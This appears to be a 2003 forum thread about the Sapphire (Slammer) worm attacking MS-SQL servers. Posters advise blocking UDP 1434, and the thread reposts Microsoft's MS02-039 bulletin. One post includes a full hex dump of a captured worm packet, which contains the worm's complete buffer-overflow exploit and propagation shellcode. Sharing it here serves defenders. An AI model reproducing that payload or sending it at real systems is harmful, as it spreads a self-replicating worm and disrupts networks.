heard...

Block open ports 1433, 1434 off the internet for both UDP and TCP. The worm which crippled the internet 3 days ago, spreads by causing a DoS attack on SQL 2000 and border Cisco routers, causing lock ups.

A patch has been out for a long time, so its time to patch and DENY and DROP those packets.


I've completed an analysis of the 'Sapphire' SQL worm targeting MS-SQL
servers. Some have reported massive slowdowns. An interesting part of this
worm results from its use of UDP. Attacked hosts/networks may generate ICMP
Host/Port Unreachable messages in response to a Sapphire attack, amplifying
the attack's strength. One reason that this attack is worse for users of
home systems, etc. that don't run any servers, is because Sapphire sends the
entire 400 bytes or so in the initial packet, where scans from Code Red and
bretheren only prompted a 26 byte TCP SYN packet.

The full analysis is available at:
http://www.techie.hopto.org/sqlworm.html



Hi,

This seems to have started for us about 4:30pm (GMT+11) today.

Lucky for us we block all MS-SQL 1434/udp traffic. We have logged over
130,000 firewall blocked connections across 15 odd sites, and it's comming in
from all over the world.

I don't have any infected servers to study the habits of this worm, but the
payload seems to always look pretty much like this.

8<---snip
20:56:02.115087 X.X.X.X.4178 > X.X.X.X.1434: [udp sum ok] udp 376 (ttl 109,
id 46811)
0000: 4500 0194 b6db 0000 6d11 2e2d 89e5 0a9c E...¶Û..m..-.å..
0010: cb08 07c7 1052 059a 0180 bda8 0401 0101 Ë..Ç.R....½¨....
0020: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0030: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0040: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0050: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0060: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0070: 0101 0101 0101 0101 0101 0101 01dc c9b0 .............ÜÉ°
0080: 42eb 0e01 0101 0101 0101 70ae 4201 70ae Bë........p®B.p®
0090: 4290 9090 9090 9090 9068 dcc9 b042 b801 B........hÜÉ°B¸.
00a0: 0101 0131 c9b1 1850 e2fd 3501 0101 0550 ...1ɱ.Pâý5....P
00b0: 89e5 5168 2e64 6c6c 6865 6c33 3268 6b65 .åQh.dllhel32hke
00c0: 726e 5168 6f75 6e74 6869 636b 4368 4765 rnQhounthickChGe
00d0: 7454 66b9 6c6c 5168 3332 2e64 6877 7332 tTf¹llQh32.dhws2
00e0: 5f66 b965 7451 6873 6f63 6b66 b974 6f51 _f¹etQhsockf¹toQ
00f0: 6873 656e 64be 1810 ae42 8d45 d450 ff16 hsend¾..®B.EÔPÿ.
0100: 508d 45e0 508d 45f0 50ff 1650 be10 10ae P.EàP.EðPÿ.P¾..®
0110: 428b 1e8b 033d 558b ec51 7405 be1c 10ae B....=U.ìQt.¾..®
0120: 42ff 16ff d031 c951 5150 81f1 0301 049b Bÿ.ÿÐ1ÉQQP.ñ....
0130: 81f1 0101 0101 518d 45cc 508b 45c0 50ff .ñ....Q.EÌP.EÀPÿ
0140: 166a 116a 026a 02ff d050 8d45 c450 8b45 .j.j.j.ÿÐP.EÄP.E
0150: c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 ÀPÿ..Æ.Û.ó<aÙÿ.E
0160: b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829 ´..@...Áâ..ÂÁâ.)
0170: c28d 0490 01d8 8945 b46a 108d 45b0 5031 Â....Ø.E´j..E°P1
0180: c951 6681 f178 0151 8d45 0350 8b45 ac50 ÉQf.ñx.Q.E.P.E¬P
0190: ffd6 ebca ÿÖëÊ
8<---snip


I would also recommend that all your IDS sensors get a new signature to record
all outbound 1434/udp in case it sneaks into your networks via private links,
etc.

Regards,

Ed.




> I'm getting massive packet loss to various points on the globe.
> I am seeing a lot of these in my tcpdump output on each
> host.
>
> 02:06:31.017088 150.140.142.17.3047 > 24.193.37.212.ms-sql-m: udp 376
> 02:06:31.017244 24.193.37.212 > 150.140.142.17: icmp: 24.193.37.212 udp
> port ms-sql-m unreachable [tos 0xc0
>
> It looks like there's a worm affecting MS SQL Server which is
> pingflooding addresses at some random sequence.
>
> All admins with access to routers should block port 1434 (ms-sql-m)!
>
> Everyone running MS SQL Server shut it the hell down or make
> sure it can't access the internet proper!
>
> I make no guarantees that this information is correct, test it
> out for yourself!




Some News: http://news.zdnet.co.uk/story/0,,t269-s2099780,00.html
Advisory: http://www.nextgenss.com/advisories/mssql-udp.txt
Microsoft Fix:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/MS02-039.asp

MS SQL listens on port 1434/udp so that clients can figure out which method
of communication to use (named pipes, tcp/ip et al)
there are two problems that yield ability to execute code remotely while
unauthenticated.

Hi Prana.

Any ideas if the loophole only exists for MS SQL 2000 or are older Versions like 7.0 also affected.

At my Company we do run MS SQL 7.0, but luckily only for testing and playing around with.

Actual DBases are Sybase, Oracle & UDB.
:D

Thanks, for any info.

dunno what any of that means but it doesnt sound good :(
thanks for the info buddy

dawood

Originally posted by Laughing Cow
Hi Prana.

Any ideas if the loophole only exists for MS SQL 2000 or are older Versions like 7.0 also affected.

At my Company we do run MS SQL 7.0, but luckily only for testing and playing around with.

Actual DBases are Sybase, Oracle & UDB.
:D

Thanks, for any info.


Buffer Overruns in SQL Server 2000 Resolution Service Could Enable Code Execution (Q323875)
Originally posted: July 24, 2002

Summary
Who should read this bulletin: System administrators using Microsoft® SQL Server™ 2000 and Microsoft Desktop Engine 2000.

Impact of vulnerability: Three vulnerabilities, the most serious of which could enable an attacker to gain control over an affected server.

Maximum Severity Rating: Critical

Recommendation: System administrators should install the patch immediately.

Affected Software:

Microsoft SQL Server 2000
Microsoft Desktop Engine (MSDE) 2000

Technical details
Technical description:


SQL Server 2000 and MSDE 2000 introduce the ability to host multiple instances of SQL Server on a single physical machine. Each instance operates for all intents and purposes as though it was a separate server. However, the multiple instances cannot all use the standard SQL Server session port (TCP 1433). While the default instance listens on TCP port 1433, named instances listen on any port assigned to them. The SQL Server Resolution Service, which operates on UDP port 1434, provides a way for clients to query for the appropriate network endpoints to use for a particular SQL Server instance.

There are three security vulnerabilities here. The first two are buffer overruns. By sending a carefully crafted packet to the Resolution Service, an attacker could cause portions of system memory (the heap in one case, the stack in the other) to be overwritten. Overwriting it with random data would likely result in the failure of the SQL Server service; overwriting it with carefully selected data could allow the attacker to run code in the security context of the SQL Server service.

SQL Server 2000 runs in a security context chosen by the administrator at installation time. By default, it runs as a Domain User. Thus, although the attacker’s code could take any desired action on the database, it would not necessarily have significant privileges at the operating system level if best practices have been followed.
The risk posed by the vulnerability could be mitigated by, if feasible, blocking port 1434 at the firewall.
Denial of Service via SQL Server Resolution Service:
An attack could be broken off by restarting the SQL Server 2000 service on either of the affected systems. Normal processing on both systems would resume once the attack ceased.
The vulnerability provides no way to gain any privileges on the system. It is a denial of service vulnerability only.
Severity Rating: Buffer Overruns in SQL Server Resolution Service: Internet Servers Intranet Servers Client Systems
SQL Server 2000 Critical Critical None
Denial of Service via SQL Server Resolution Service: Internet Servers Intranet Servers Client Systems
SQL Server 2000 Critical Critical None
The above assessment is based on the types of systems affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.

Vulnerability identifier:

Buffer Overruns in SQL Server Resolution Service: CVE-CAN-2002-0649
Denial of Service via SQL Server Resolution Service: CVE-CAN-2002-0650
Tested Versions:
Microsoft tested SQL Server 2000 and 7.0 (and their associated versions of MSDE) to assess whether they are affected by these vulnerabilities. Previous versions are no longer supported, and may or may not be affected by these vulnerabilities.




Is the UDP 1434 port typically blocked at the firewall?

It depends on the particular deployment scenario.

If a network doesn’t host any Internet-connected SQL Servers, the port associated with the SQL Server Resolution Service (and all other ports associated with SQL Server) should be blocked.
If a network offers SQL Server services to the Internet but there’s only a single instance on the server, the SQL Resolution Service can and should be blocked.
If a network offers SQL Server services to the Internet and has more than one instance, the SQL Resolution Service must be accessible through the firewall.
Does the SQL Server Resolution Service exist on previous versions of SQL Server?

No. Previous versions of SQL Server didn’t support multiple instances, and the SQL Server Resolution Service didn’t exist. As a result, no other versions of SQL Server are affected by the vulnerabilities.

The Affected Versions section says that Microsoft Desktop Engine (MSDE) is also affected by these vulnerabilities. What is MSDE?

MSDE is a database engine that’s built and based on SQL Server 2000 technology, and which ships as part of several Microsoft products, including Microsoft Visual Studio and Microsoft Office Developer Edition. There is a direct connection between versions of MSDE and versions of SQL Server. MSDE 2000 is based on SQL Server 2000.


How does the patch eliminate the vulnerability?


Patch availability
Download locations for this patch
Microsoft SQL Server 2000 and MSDE 2000:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=40602

Additional information about this patch
Installation platforms:
This patch can be installed on systems running SQL Server 2000 Service Pack 2.
Inclusion in future service packs:
The fix for this issue will be included in SQL Server 2000 Service Pack 3.

Reboot needed: No. The SQL Server service only needs to be restarted after applying the patch.

Patch can be uninstalled: Yes.

Superseded patches: None.

Verifying patch installation:

To ensure you have the fix installed properly, verify the individual files by consulting the date/time stamp of the files listed in the file manifest in Microsoft Knowledge Base article Q316333.
Caveats:
None


Security patches are available from the Microsoft Download Center, and can be most easily found by doing a keyword search for "security_patch".
Patches for consumer platforms are available from the WindowsUpdate web site
Other information:
Acknowledgments
Microsoft thanks David Litchfield of Next Generation Security Software Ltd. for reporting these issues to us and working with us to protect customers.

Support:

Microsoft Knowledge Base article Q323875 discusses this issue and will be available approximately 24 hours after the release of this bulletin. Knowledge Base articles can be found on the Microsoft Online Support web site.
Technical support is available from Microsoft Product Support Services. There is no charge for support calls associated with security patches.
Security Resources: The Microsoft TechNet Security Web Site provides additional information about security in Microsoft products.



Dezhen :) No worries, just wanna inform you guys

Prana.

Thanks, for the info.

It cleared things up for me.

Microsoft Sux, Time for Whopner.